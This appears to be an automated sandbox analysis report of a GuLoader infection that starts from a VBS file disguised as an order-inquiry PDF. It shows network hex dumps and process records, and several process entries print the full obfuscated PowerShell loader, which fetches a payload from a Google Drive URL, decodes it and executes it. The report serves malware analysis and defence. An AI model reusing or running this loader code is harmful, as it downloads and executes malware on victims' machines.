            2024-09-16 12:45:51 UTC1390INData Raw: 9a 3e ff 95 4b f4 b9 60 61 0d aa 7c 66 bf e8 66 be 39 90 a0 14 6e 9c d9 dd e8 19 77 a7 79 fb ac c1 ea 3b 99 e9 d5 96 4c 56 b7 63 07 b1 7d 9e 5a 1b da c1 b3 42 43 0a 91 5d 68 bd 18 2b 42 fd 57 d2 8d c4 88 24 4b ac 89 4a 3e fd 45 66 f0 31 cb 47 f7 a7 b9 8d c5 aa 86 9c 32 50 0a a0 eb 30 dd 00 1c 2f fe c7 ee 0b f7 76 e3 fd 2e 0b 21 56 9b e2 b0 03 d1 dc 52 5c ff 7d 90 57 b2 87 a2 e1 de 3d 1a 17 b1 9e 9b 11 7e e2 19 a3 b6 55 20 77 81 4c b1 e7 90 73 54 3c e7 77 6e 60 5d d9 c2 e9 8d e2 f4 07 08 96 3e e4 13 71 58 2a d3 78 0a f6 62 5c 8c 2c ec 1e 95 36 59 cf 0b 8d 9f b2 33 bf 7a 93 09 c8 47 95 b5 cd 1a 4a b1 e8 2b b0 0e ed 68 8f e8 08 24 e7 06 94 d7 6f 10 91 0f dd b0 b4 e6 4f 89 e4 60 dd b9 fa 46 1a 59 a9 9b 0a 92 85 4f 32 5d d9 ca a0 96 a6 7b 36 af e7 1c 90 ae d2
            Data Ascii: >K`a|ff9nwy;LVc}ZBC]h+BW$KJ>Ef1G2P0/v.!VR\}W=~U wLsT<wn`]>qX*xb\,6Y3zGJ+h$oO`FYO2]{6
            2024-09-16 12:45:51 UTC1390INData Raw: 9a a6 8a 3e a7 3b d5 af c9 ec 9d d6 27 fe 7b 36 f6 bc 2f 83 a5 c7 e1 e9 36 30 4e 10 50 aa f8 db b6 54 d0 74 d0 a0 1c aa c0 3c b7 65 af f7 09 21 d4 2d b5 f5 98 97 d2 10 63 3f 46 99 38 3d 30 6c 78 5a 39 4f 11 fa ee 31 ad 2e 49 a6 d4 4c 00 d8 39 61 b2 9b 33 ec 77 c0 c1 49 c6 c0 0b ed 85 53 12 f5 8d 6a b2 f3 6f ff 6c d5 c0 39 a2 d3 38 e3 32 d9 39 5e 7a d3 52 e2 f5 6b da a7 da 63 28 fa 43 4a 84 87 ea b8 03 ac 1d c9 55 98 35 9b 1c ed 28 60 bb 49 80 cc 6e a3 fc 77 4c f1 9b 59 1c bb 59 c3 a2 b6 fe 5b a8 f4 d6 53 f5 da bc 83 4d 0f 6e 78 08 bb a6 47 cd 34 b2 d7 7c ba d7 75 07 e2 6e fc ff 2b 4a de c4 15 c9 b4 4c 8e 48 04 d9 8e cf 37 21 b7 2f f5 c6 2b 8e e9 45 5d bc a5 30 fd 3c 7e 67 e8 0c 9d 5c e5 b5 36 bd 4b 93 94 a4 e0 dd 82 f1 93 07 bb 39 35 78 23 c6 c6 c9 bb 16
            Data Ascii: >;'{6/60NPTt<e!-c?F8=0lxZ9O1.IL9a3wISjol9829^zRkc(CJU5(`InwLYY[SMnxG4|un+JLH7!/+E]0<~g\6K95x#
            2024-09-16 12:45:51 UTC1390INData Raw: 87 59 5f 30 3b 10 cf 19 fc 4d a5 7b 3e 55 f9 d6 c9 44 6a 25 ef 37 4f f6 77 22 d2 bf 0f c1 b9 89 14 b8 41 68 35 37 ec 7c 22 88 55 f2 2f 0a c2 62 2d 8b 94 45 12 ca 2e e5 71 94 8e 95 3d 07 c7 61 80 df 4e 65 92 a9 94 13 5d 5f 12 ad 4d c8 3b 75 7e 27 22 21 d7 1d 4c 53 b1 78 aa 36 e4 ff f1 51 8a 6f 09 f8 3f d8 12 6c cc f5 27 dd 3d 1d f6 88 98 01 6a a4 b2 ad 78 4d d3 08 f3 54 74 40 8e 2c 8e 4e 52 55 43 f7 c6 3a a3 01 f3 68 cd 45 90 ac 88 84 c2 98 e4 8e ea 7f a6 32 61 f1 98 9e b4 a6 ef 40 c7 b8 76 94 fd 7f 69 33 af ef 9d 23 c5 96 0b d0 c5 49 8a 03 6e 20 cd 6b ed 9f a4 ee 6a b7 35 c2 c8 e7 94 d7 65 25 bf 84 5b eb 8c 55 ec 0b 9e 0c 60 32 fd 93 b7 9e 5f 4d bc 81 96 5c d2 cd e9 06 57 3e 9f d6 94 43 37 02 ed c6 9e 69 f6 62 4f 84 f6 48 83 2e 6b 57 b3 db ab 8a 47 25 d5
            Data Ascii: Y_0;M{>UDj%7Ow"Ah57|"U/b-E.q=aNe]_M;u~'"!LSx6Qo?l'=jxMTt@,NRUC:hE2a@vi3#In kj5e%[U`2_M\W>C7ibOH.kWG%
            2024-09-16 12:45:51 UTC1390INData Raw: f9 2c 3d b7 59 f6 84 50 16 8a 79 60 3c 78 fd 79 ea 33 e8 18 52 9e 4c 0b 1c 08 df ca f4 b6 32 8b 99 b6 87 90 cc 95 96 ec 81 a5 c4 d3 5d a2 c2 40 14 d3 6f 3d a3 75 1a 9d 41 1b 74 17 a9 79 a9 40 6b ef 80 09 9b 97 42 8b ff bb 8b 43 84 8b 3e 5b db 71 9e 59 89 d6 98 c9 7a b3 5d 06 87 4f 74 46 14 fc b1 7d f5 f8 4b 20 3a 58 cd c5 b8 7e 25 bb 52 99 74 8a ed 80 1f b5 24 87 29 9f 57 0f 58 31 50 0e cd df 2a a8 e4 e0 c9 bd 9b 11 47 54 b0 6d 67 82 30 72 58 96 a8 07 7b 3d ac aa 1a b0 c3 4a 48 b5 f9 11 a5 83 f4 0d ca d4 50 d4 af 37 44 b1 e0 94 4f 45 07 7a f3 f3 41 21 84 b7 c3 0e a8 f5 7b ff 95 dd 9b 6d 94 28 28 9d c5 4f f4 48 61 eb fe a8 f7 35 24 d3 f5 6d 4e 17 17 bf 1d f5 d6 d8 55 35 b0 19 43 0b e1 89 53 d2 6e 47 61 c9 83 f6 8f 78 7f bf ef b0 ad c0 8c 37 fd 73 dc 33 70
            Data Ascii: ,=YPy`<xy3RL2]@o=uAty@kBC>[qYz]OtF}K :X~%Rt$)WX1P*GTmg0rX{=JHP7DOEzA!{m((OHa5$mNU5CSnGax7s3p


            Statistics

            CPU Usage

            Click to jump to process

            Memory Usage

            Click to jump to process

            High Level Behavior Distribution

            Click to dive into process behavior distribution

            Behavior

            Click to jump to process

            System Behavior

            General

            Target ID:0
            Start time:08:44:57
            Start date:16/09/2024
            Path:C:\Windows\System32\wscript.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order Inquiry RFQ #278823_pdf.vbs"
            Imagebase:0x7ff6bad30000
            File size:170'496 bytes
            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            General

            Target ID:1
            Start time:08:45:00
            Start date:16/09/2024
            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Wow64 process (32bit):false
            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Debrief klargoeringstekniker overmortgaged Kernefrugterne chewers underrealises #>;$Nethes='Regreskravenes';<#hertugdoemmer Accessionernes Vitaminisering senvy #>;$Hawse=$host.PrivateData;If ($Hawse) {$Justerkammer++;}function Bisulc($supernumerary){$Frstestyrmand=$supernumerary.Length-$Justerkammer;for( $Entremess=3;$Entremess -lt $Frstestyrmand;$Entremess+=4){$Bar+=$supernumerary[$Entremess];}$Bar;}function Brdnidens($Naturaliseredes){ .($spectrographic) ($Naturaliseredes);}$Brnehospitalerne=Bisulc 'LocMDraoBrnz Tji M,l Fal la T /Ga,5Tan. f0Bog Vea(PilWDi iselnv ndD mo,alwslassta stNsanT To gro1Ov 0,et.Fac0Ov ;.to NonWCuri atnUnd6N,c4 Ch; ci ArbxUd,6For4Kn,;she HarNonv Fa:Non1N,n2fla1Mar.Naz0H m),ul MaG Cae axc nok H.oOps/ Ac2 lo0Teg1 uk0N n0slh1Vir0 Bo1hum stuF koiU tr kePelf .uo caxEw./ e1Bar2bol1Lan.pol0s,n ';$Paplike=Bisulc 'EndU epsH,uEs.bRshr-DepANa g K eAlgNN at Al ';$Overconfidences=Bisulc 'equhBultElstKiupsyssfra: .o/J.h/ sodK.nrBrni mav oeIsl.selgDemo A.ori,gKillsabeUnc. CacLsbo MumThe/Hu.u omcE g?ArbeHeixbilpDecoHemrUndtBla= ChdsnioFulwIndn uplTagoCema,oidDid&BaiiB uddom= .e1cyc-HarMIn 5FerLFu z UnL,ollsp,VTh hLaag Brmsam9End2 Re1KorZTigw selZe uNav8 arI ArQ.if3Te w.atK PrOHo u DiCMi 8innUWhi8ConqCornsal ';$Corbovinum=Bisulc ' sp>Tai ';$spectrographic=Bisulc 'suci NoE VeXpel ';$accretive='Aphanozygous';$Tilvrelsens = Bisulc '.useB nc Fohe nosc Gli%rimaUfop P.p.irdPelaY.ut rea il% ul\ ,oIHa.lBaadH rp A r onvHisePal. ppFThuoForkUn. Tr&Tvr& P Cue RucIndh.ncoTa. Fartink ';Brdnidens (Bisulc 'Uin$Vocg lvlMedoOscb raAx ls,i:AliR rivUdle empAffeFl,lcirsskoe PonMare re=Gru( rc P.msupd U. Ind/UndcUnd He $BilT BriProlBenvKalrdryeL,nlTetsupae klnMetsIsd)Din ');Brdnidens (Bisulc 'Int$geogDoklDe oskrbPr as ml Dr:,nhL IngHeteTr dDesoskimConms de C npatsB.r= Co$FryOAervDreeVanrConcKeloNonnAnafTr,iTvidCateTownGuacRuseUngsI.d.stas.urp bol Peic stPhy(War$st.CConoTelrsambBr oskuvTakiCurn houNonmPer)sce ');Brdnidens (Bisulc 'Ple[parN.ide,iltDek. ens sue Anr TevCriidolc BaeforPfiro Uaisemn Trt .mM Mia onnForasubg FleHalr in]Ir : U :BlisResePhoc stucirrBesiGrntWhuyIncP.inr Ego PatAf.oTrvcUn,oEnelEnt .at= Tu G [PelNCr,eslatArm. PosBa eG ocMa uArbrDo iscutBefysprPVelr C ostytDisos rcslaostil aaT atyEmipaxse Wa] Re:Dry:I.mTAl.lsessNe 1Pas2 .l ');$Overconfidences=$Lgedommens[0];$Continuums= (Bisulc ' wi$CepG DuL aroBagBNonA alL,em: CaMC laKn c H,RBliOEliRBruhse iUafNHjsUEugs o2Wi,1Fo,8o s=Moun Ave HyWM d- dfo KabPreJ.hoeBanCMexTIm EnrsDu yGevssipt U e ,uMOce.FolnMacE P T Un.BajwKylEE sBC lCD.dLOmdiUrbE ExNDa T');$Continuums+=$Rvepelsene[1];Brdnidens ($Continuums);Brdnidens (Bisulc 'cal$O aMAn a pcPlar Beo ntrDivhCroiPernsocuD ssB,r2 e1 Pl8 Os.sikHVe,e TraPupdKo eBearCtesRat[ Ec$InsPRa,aHygpLoblHaeiLolk GueO e]Tru=Uaf$Ut B s.rskrnsele H hKo oVers grpForiMant FraVillO.seMi rH.inPlaeMis ');$Kardinalen=Bisulc 'C,r$GruMClaaModcGeor .eoBorrta hPioiGlanUnau Cas En2R p1 Op8Br.. ,uDElsoComw,tbnRe lskaoscraVandKinFOppiOx,lAfteTra( De$WalOV.jvChae.esrRelcBa.oJacnsysf oniAcidstueDubnPlocFoyeNonsBha,sea$fo GFrsl Noo.istAnftpriiAluc Eg1,ed)H.r ';$Glottic1=$Rvepelsene[0];Brdnidens (Bisulc 'Arb$ olGDimlTndOEs.bMela IllGei:sans.orkElerPopmM.adTidE,orsAkeIA wgRemNescsTa.= sk(D st ndeG ssBa tCiv- PaPKona FrT,nbHAut Fic$Ir.gTa LTriO.onTBliT DuiBevCDor1J,n) or ');while (!$skrmdesigns) {Brdnidens (Bisulc 'Th.$Hslg DolH.bo rob F.a aulskr:Un DAp r,nseLeanNitg.mleKosaWaraswir OueKrenBodeRec=Wak$ mtVldr slu steDr, ') ;Brdnidens $Kardinalen;Brdnidens (Bisulc ' nesLait GeaVarr BetTea-Pa,s smlU pe.haeGe.pT n Ph,4Pse ');Brdnidens (Bisulc ',ro$PsegNonl egospab sua ,clDok: OusNe kOceraffm F,dUdde HesKn iBdrgUn.nEsbsska=squ(D lTslaelegsMutt ,e- aPs.eaGemtTenhPri An$OutG islPreo Tit OrtUn.iUnbcTor1Dri)Pre ') ;Brdnidens (Bisulc 'Evo$Bo gDislnazoH,nbswaaDi.l.fs:Eu RUnme oudKliiUnbvWatiLe,d.esi hn A gKn =Jah$ BlgCurlLysoDelbOdoaBesl o:FllKHeniPatkDe,rs at fsExo+F i+Ene% Ol$BryLYn gL ne redFiloklymNorm Noe .nnAissDef.OpkcGetoBeduTron st tr ') ;$Overconfidences=$Lgedommens[$Redividing];}$Disingenious=336954;$Rygte=27292;Brdnidens (Bisulc 'Anp$Unsg DalAptoT rb H.a olKol:PreTsunaBusrstessoto tvnAlneD xm roistudPhy Me = I s,aGH ge Det Du-kerC Isosupnsa,tsaseCron emtBr Hi$ aGom lA,bo ptHe tKaniKoncDek1Tot ');Brdnidens (Bisulc 'Unv$Covg U l .nostobEngaManl ko: soTFulu,mgmBanl eee enInd Cal=Ung str[ evs PryUnfsRevtspeePr m or.DevCP,oo lenKaev ,ees,drUnstC o]Hip:s p:UngFFunr Hao nemPh.BO.eas assnies.b6Bar4 HysWantDolrTakiFa n,xhgVic( Mi$PotT OvaRu,rkonsPr,o .anE oesudmsdeiFn d Ch)Cyr ');Brdnidens (Bisulc ' so$UnrgRealLamoansb R,a Felbr,:ResbUdrostal sqcAsohPireKolrB onDiseTjrs ,e Pre= C, Ov[ Gas.usyPhos s toveeOr.m sc.Cy TPire,idxGratsu .Me,E Mensa c stoUd.d s,i,renFregDou]B,y:Cha:GevA Eks KlC hnICouI Un.PedG,paeIn t FrsGutt InrCoui T n,gagTea(O,e$ra T DeuKlvm.ynlOmse scn Pa)pho ');Brdnidens (Bisulc '.al$ChogsonlRepoIllbJeta ilsch:LakC E,cPr iT,ilHeliLuduBivs.an=Mag$ RabC noWablsafcskrhTameFadrTecnUn e AlsTor.AyosAdduPr bGrasZeatA.lrPlaib.nnFrogGem(Ban$CalD niRygsFi,is pnHa,gRobeEndnReiiNo.oDeduFrasNer,Bir$JusRbliy amgb otToxeCon)syn ');Brdnidens $Ccilius;"
            Imagebase:0x7ff788560000
            File size:452'608 bytes
            MD5 hash:04029E121A0CFA5991749937DD22A1D9
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000001.00000002.2387730069.000001F2AF194000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            Reputation:high
            Has exited:true

            General

            Target ID:2
            Start time:08:45:00
            Start date:16/09/2024
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff7699e0000
            File size:862'208 bytes
            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            General

            Target ID:3
            Start time:08:45:03
            Start date:16/09/2024
            Path:C:\Windows\System32\cmd.exe
            Wow64 process (32bit):false
            Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Ildprve.Fok && echo t"
            Imagebase:0x7ff72dbc0000
            File size:289'792 bytes
            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            General

            Target ID:5
            Start time:08:45:18
            Start date:16/09/2024
            Path:C:\Windows\System32\cmd.exe
            Wow64 process (32bit):false
            Commandline:"C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<#Debrief klargoeringstekniker overmortgaged Kernefrugterne chewers underrealises #>;$Nethes='Regreskravenes';<#hertugdoemmer Accessionernes Vitaminisering senvy #>;$Hawse=$host.PrivateData;If ($Hawse) {$Justerkammer++;}function Bisulc($supernumerary){$Frstestyrmand=$supernumerary.Length-$Justerkammer;for( $Entremess=3;$Entremess -lt $Frstestyrmand;$Entremess+=4){$Bar+=$supernumerary[$Entremess];}$Bar;}function Brdnidens($Naturaliseredes){ .($spectrographic) ($Naturaliseredes);}$Brnehospitalerne=Bisulc 'LocMDraoBrnz Tji M,l Fal la T /Ga,5Tan. f0Bog Vea(PilWDi iselnv ndD mo,alwslassta stNsanT To gro1Ov 0,et.Fac0Ov ;.to NonWCuri atnUnd6N,c4 Ch; ci ArbxUd,6For4Kn,;she HarNonv Fa:Non1N,n2fla1Mar.Naz0H m),ul MaG Cae axc nok H.oOps/ Ac2 lo0Teg1 uk0N n0slh1Vir0 Bo1hum stuF koiU tr kePelf .uo caxEw./ e1Bar2bol1Lan.pol0s,n ';$Paplike=Bisulc 'EndU epsH,uEs.bRshr-DepANa g K eAlgNN at Al ';$Overconfidences=Bisulc 'equhBultElstKiupsyssfra: .o/J.h/ sodK.nrBrni mav oeIsl.selgDemo A.ori,gKillsabeUnc. CacLsbo MumThe/Hu.u omcE g?ArbeHeixbilpDecoHemrUndtBla= ChdsnioFulwIndn uplTagoCema,oidDid&BaiiB uddom= .e1cyc-HarMIn 5FerLFu z UnL,ollsp,VTh hLaag Brmsam9End2 Re1KorZTigw selZe uNav8 arI ArQ.if3Te w.atK PrOHo u DiCMi 8innUWhi8ConqCornsal ';$Corbovinum=Bisulc ' sp>Tai ';$spectrographic=Bisulc 'suci NoE VeXpel ';$accretive='Aphanozygous';$Tilvrelsens = Bisulc '.useB nc Fohe nosc Gli%rimaUfop P.p.irdPelaY.ut rea il% ul\ ,oIHa.lBaadH rp A r onvHisePal. ppFThuoForkUn. Tr&Tvr& P Cue RucIndh.ncoTa. Fartink ';Brdnidens (Bisulc 'Uin$Vocg lvlMedoOscb raAx ls,i:AliR rivUdle empAffeFl,lcirsskoe PonMare re=Gru( rc P.msupd U. Ind/UndcUnd He $BilT BriProlBenvKalrdryeL,nlTetsupae klnMetsIsd)Din ');Brdnidens (Bisulc 'Int$geogDoklDe oskrbPr as ml Dr:,nhL IngHeteTr dDesoskimConms de C npatsB.r= Co$FryOAervDreeVanrConcKeloNonnAnafTr,iTvidCateTownGuacRuseUngsI.d.stas.urp bol Peic stPhy(War$st.CConoTelrsambBr oskuvTakiCurn houNonmPer)sce ');Brdnidens (Bisulc 'Ple[parN.ide,iltDek. ens sue Anr TevCriidolc BaeforPfiro Uaisemn Trt .mM Mia onnForasubg FleHalr in]Ir : U :BlisResePhoc stucirrBesiGrntWhuyIncP.inr Ego PatAf.oTrvcUn,oEnelEnt .at= Tu G [PelNCr,eslatArm. PosBa eG ocMa uArbrDo iscutBefysprPVelr C ostytDisos rcslaostil aaT atyEmipaxse Wa] Re:Dry:I.mTAl.lsessNe 1Pas2 .l ');$Overconfidences=$Lgedommens[0];$Continuums= (Bisulc ' wi$CepG DuL aroBagBNonA alL,em: CaMC laKn c H,RBliOEliRBruhse iUafNHjsUEugs o2Wi,1Fo,8o s=Moun Ave HyWM d- dfo KabPreJ.hoeBanCMexTIm EnrsDu yGevssipt U e ,uMOce.FolnMacE P T Un.BajwKylEE sBC lCD.dLOmdiUrbE ExNDa T');$Continuums+=$Rvepelsene[1];Brdnidens ($Continuums);Brdnidens (Bisulc 'cal$O aMAn a pcPlar Beo ntrDivhCroiPernsocuD ssB,r2 e1 Pl8 Os.sikHVe,e TraPupdKo eBearCtesRat[ Ec$InsPRa,aHygpLoblHaeiLolk GueO e]Tru=Uaf$Ut B s.rskrnsele H hKo oVers grpForiMant FraVillO.seMi rH.inPlaeMis ');$Kardinalen=Bisulc 'C,r$GruMClaaModcGeor .eoBorrta hPioiGlanUnau Cas En2R p1 Op8Br.. ,uDElsoComw,tbnRe lskaoscraVandKinFOppiOx,lAfteTra( De$WalOV.jvChae.esrRelcBa.oJacnsysf oniAcidstueDubnPlocFoyeNonsBha,sea$fo GFrsl Noo.istAnftpriiAluc Eg1,ed)H.r ';$Glottic1=$Rvepelsene[0];Brdnidens (Bisulc 'Arb$ olGDimlTndOEs.bMela IllGei:sans.orkElerPopmM.adTidE,orsAkeIA wgRemNescsTa.= sk(D st ndeG ssBa tCiv- PaPKona FrT,nbHAut Fic$Ir.gTa LTriO.onTBliT DuiBevCDor1J,n) or ');while (!$skrmdesigns) {Brdnidens (Bisulc 'Th.$Hslg DolH.bo rob F.a aulskr:Un DAp r,nseLeanNitg.mleKosaWaraswir OueKrenBodeRec=Wak$ mtVldr slu steDr, ') ;Brdnidens $Kardinalen;Brdnidens (Bisulc ' nesLait GeaVarr BetTea-Pa,s smlU pe.haeGe.pT n Ph,4Pse ');Brdnidens (Bisulc ',ro$PsegNonl egospab sua ,clDok: OusNe kOceraffm F,dUdde HesKn iBdrgUn.nEsbsska=squ(D lTslaelegsMutt ,e- aPs.eaGemtTenhPri An$OutG islPreo Tit OrtUn.iUnbcTor1Dri)Pre ') ;Brdnidens (Bisulc 'Evo$Bo gDislnazoH,nbswaaDi.l.fs:Eu RUnme oudKliiUnbvWatiLe,d.esi hn A gKn =Jah$ BlgCurlLysoDelbOdoaBesl o:FllKHeniPatkDe,rs at fsExo+F i+Ene% Ol$BryLYn gL ne redFiloklymNorm Noe .nnAissDef.OpkcGetoBeduTron st tr ') ;$Overconfidences=$Lgedommens[$Redividing];}$Disingenious=336954;$Rygte=27292;Brdnidens (Bisulc 'Anp$Unsg DalAptoT rb H.a olKol:PreTsunaBusrstessoto tvnAlneD xm roistudPhy Me = I s,aGH ge Det Du-kerC Isosupnsa,tsaseCron emtBr Hi$ aGom lA,bo ptHe tKaniKoncDek1Tot ');Brdnidens (Bisulc 'Unv$Covg U l .nostobEngaManl ko: soTFulu,mgmBanl eee enInd Cal=Ung str[ evs PryUnfsRevtspeePr m or.DevCP,oo lenKaev ,ees,drUnstC o]Hip:s p:UngFFunr Hao nemPh.BO.eas assnies.b6Bar4 HysWantDolrTakiFa n,xhgVic( Mi$PotT OvaRu,rkonsPr,o .anE oesudmsdeiFn d Ch)Cyr ');Brdnidens (Bisulc ' so$UnrgRealLamoansb R,a Felbr,:ResbUdrostal sqcAsohPireKolrB onDiseTjrs ,e Pre= C, Ov[ Gas.usyPhos s toveeOr.m sc.Cy TPire,idxGratsu .Me,E Mensa c stoUd.d s,i,renFregDou]B,y:Cha:GevA Eks KlC hnICouI Un.PedG,paeIn t FrsGutt InrCoui T n,gagTea(O,e$ra T DeuKlvm.ynlOmse scn Pa)pho ');Brdnidens (Bisulc '.al$ChogsonlRepoIllbJeta ilsch:LakC E,cPr iT,ilHeliLuduBivs.an=Mag$ RabC noWablsafcskrhTameFadrTecnUn e AlsTor.AyosAdduPr bGrasZeatA.lrPlaib.nnFrogGem(Ban$CalD niRygsFi,is pnHa,gRobeEndnReiiNo.oDeduFrasNer,Bir$JusRbliy amgb otToxeCon)syn ');Brdnidens $Ccilius;"
            Imagebase:0x7ff72dbc0000
            File size:289'792 bytes
            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            General

            Target ID:6
            Start time:08:45:18
            Start date:16/09/2024
            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            Wow64 process (32bit):true
            Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Debrief klargoeringstekniker overmortgaged Kernefrugterne chewers underrealises #>;$Nethes='Regreskravenes';<#hertugdoemmer Accessionernes Vitaminisering senvy #>;$Hawse=$host.PrivateData;If ($Hawse) {$Justerkammer++;}function Bisulc($supernumerary){$Frstestyrmand=$supernumerary.Length-$Justerkammer;for( $Entremess=3;$Entremess -lt $Frstestyrmand;$Entremess+=4){$Bar+=$supernumerary[$Entremess];}$Bar;}function Brdnidens($Naturaliseredes){ .($spectrographic) ($Naturaliseredes);}$Brnehospitalerne=Bisulc 'LocMDraoBrnz Tji M,l Fal la T /Ga,5Tan. f0Bog Vea(PilWDi iselnv ndD mo,alwslassta stNsanT To gro1Ov 0,et.Fac0Ov ;.to NonWCuri atnUnd6N,c4 Ch; ci ArbxUd,6For4Kn,;she HarNonv Fa:Non1N,n2fla1Mar.Naz0H m),ul MaG Cae axc nok H.oOps/ Ac2 lo0Teg1 uk0N n0slh1Vir0 Bo1hum stuF koiU tr kePelf .uo caxEw./ e1Bar2bol1Lan.pol0s,n ';$Paplike=Bisulc 'EndU epsH,uEs.bRshr-DepANa g K eAlgNN at Al ';$Overconfidences=Bisulc 'equhBultElstKiupsyssfra: .o/J.h/ sodK.nrBrni mav oeIsl.selgDemo A.ori,gKillsabeUnc. CacLsbo MumThe/Hu.u omcE g?ArbeHeixbilpDecoHemrUndtBla= ChdsnioFulwIndn uplTagoCema,oidDid&BaiiB uddom= .e1cyc-HarMIn 5FerLFu z UnL,ollsp,VTh hLaag Brmsam9End2 Re1KorZTigw selZe uNav8 arI ArQ.if3Te w.atK PrOHo u DiCMi 8innUWhi8ConqCornsal ';$Corbovinum=Bisulc ' sp>Tai ';$spectrographic=Bisulc 'suci NoE VeXpel ';$accretive='Aphanozygous';$Tilvrelsens = Bisulc '.useB nc Fohe nosc Gli%rimaUfop P.p.irdPelaY.ut rea il% ul\ ,oIHa.lBaadH rp A r onvHisePal. ppFThuoForkUn. Tr&Tvr& P Cue RucIndh.ncoTa. Fartink ';Brdnidens (Bisulc 'Uin$Vocg lvlMedoOscb raAx ls,i:AliR rivUdle empAffeFl,lcirsskoe PonMare re=Gru( rc P.msupd U. Ind/UndcUnd He $BilT BriProlBenvKalrdryeL,nlTetsupae klnMetsIsd)Din ');Brdnidens (Bisulc 'Int$geogDoklDe oskrbPr as ml Dr:,nhL IngHeteTr dDesoskimConms de C npatsB.r= Co$FryOAervDreeVanrConcKeloNonnAnafTr,iTvidCateTownGuacRuseUngsI.d.stas.urp bol Peic stPhy(War$st.CConoTelrsambBr oskuvTakiCurn houNonmPer)sce ');Brdnidens (Bisulc 'Ple[parN.ide,iltDek. ens sue Anr TevCriidolc BaeforPfiro Uaisemn Trt .mM Mia onnForasubg FleHalr in]Ir : U :BlisResePhoc stucirrBesiGrntWhuyIncP.inr Ego PatAf.oTrvcUn,oEnelEnt .at= Tu G [PelNCr,eslatArm. PosBa eG ocMa uArbrDo iscutBefysprPVelr C ostytDisos rcslaostil aaT atyEmipaxse Wa] Re:Dry:I.mTAl.lsessNe 1Pas2 .l ');$Overconfidences=$Lgedommens[0];$Continuums= (Bisulc ' wi$CepG DuL aroBagBNonA alL,em: CaMC laKn c H,RBliOEliRBruhse iUafNHjsUEugs o2Wi,1Fo,8o s=Moun Ave HyWM d- dfo KabPreJ.hoeBanCMexTIm EnrsDu yGevssipt U e ,uMOce.FolnMacE P T Un.BajwKylEE sBC lCD.dLOmdiUrbE ExNDa T');$Continuums+=$Rvepelsene[1];Brdnidens ($Continuums);Brdnidens (Bisulc 'cal$O aMAn a pcPlar Beo ntrDivhCroiPernsocuD ssB,r2 e1 Pl8 Os.sikHVe,e TraPupdKo eBearCtesRat[ Ec$InsPRa,aHygpLoblHaeiLolk GueO e]Tru=Uaf$Ut B s.rskrnsele H hKo oVers grpForiMant FraVillO.seMi rH.inPlaeMis ');$Kardinalen=Bisulc 'C,r$GruMClaaModcGeor .eoBorrta hPioiGlanUnau Cas En2R p1 Op8Br.. ,uDElsoComw,tbnRe lskaoscraVandKinFOppiOx,lAfteTra( De$WalOV.jvChae.esrRelcBa.oJacnsysf oniAcidstueDubnPlocFoyeNonsBha,sea$fo GFrsl Noo.istAnftpriiAluc Eg1,ed)H.r ';$Glottic1=$Rvepelsene[0];Brdnidens (Bisulc 'Arb$ olGDimlTndOEs.bMela IllGei:sans.orkElerPopmM.adTidE,orsAkeIA wgRemNescsTa.= sk(D st ndeG ssBa tCiv- PaPKona FrT,nbHAut Fic$Ir.gTa LTriO.onTBliT DuiBevCDor1J,n) or ');while (!$skrmdesigns) {Brdnidens (Bisulc 'Th.$Hslg DolH.bo rob F.a aulskr:Un DAp r,nseLeanNitg.mleKosaWaraswir OueKrenBodeRec=Wak$ mtVldr slu steDr, ') ;Brdnidens $Kardinalen;Brdnidens (Bisulc ' nesLait GeaVarr BetTea-Pa,s smlU pe.haeGe.pT n Ph,4Pse ');Brdnidens (Bisulc ',ro$PsegNonl egospab sua ,clDok: OusNe kOceraffm F,dUdde HesKn iBdrgUn.nEsbsska=squ(D lTslaelegsMutt ,e- aPs.eaGemtTenhPri An$OutG islPreo Tit OrtUn.iUnbcTor1Dri)Pre ') ;Brdnidens (Bisulc 'Evo$Bo gDislnazoH,nbswaaDi.l.fs:Eu RUnme oudKliiUnbvWatiLe,d.esi hn A gKn =Jah$ BlgCurlLysoDelbOdoaBesl o:FllKHeniPatkDe,rs at fsExo+F i+Ene% Ol$BryLYn gL ne redFiloklymNorm Noe .nnAissDef.OpkcGetoBeduTron st tr ') ;$Overconfidences=$Lgedommens[$Redividing];}$Disingenious=336954;$Rygte=27292;Brdnidens (Bisulc 'Anp$Unsg DalAptoT rb H.a olKol:PreTsunaBusrstessoto tvnAlneD xm roistudPhy Me = I s,aGH ge Det Du-kerC Isosupnsa,tsaseCron emtBr Hi$ aGom lA,bo ptHe tKaniKoncDek1Tot ');Brdnidens (Bisulc 'Unv$Covg U l .nostobEngaManl ko: soTFulu,mgmBanl eee enInd Cal=Ung str[ evs PryUnfsRevtspeePr m or.DevCP,oo lenKaev ,ees,drUnstC o]Hip:s p:UngFFunr Hao nemPh.BO.eas assnies.b6Bar4 HysWantDolrTakiFa n,xhgVic( Mi$PotT OvaRu,rkonsPr,o .anE oesudmsdeiFn d Ch)Cyr ');Brdnidens (Bisulc ' so$UnrgRealLamoansb R,a Felbr,:ResbUdrostal 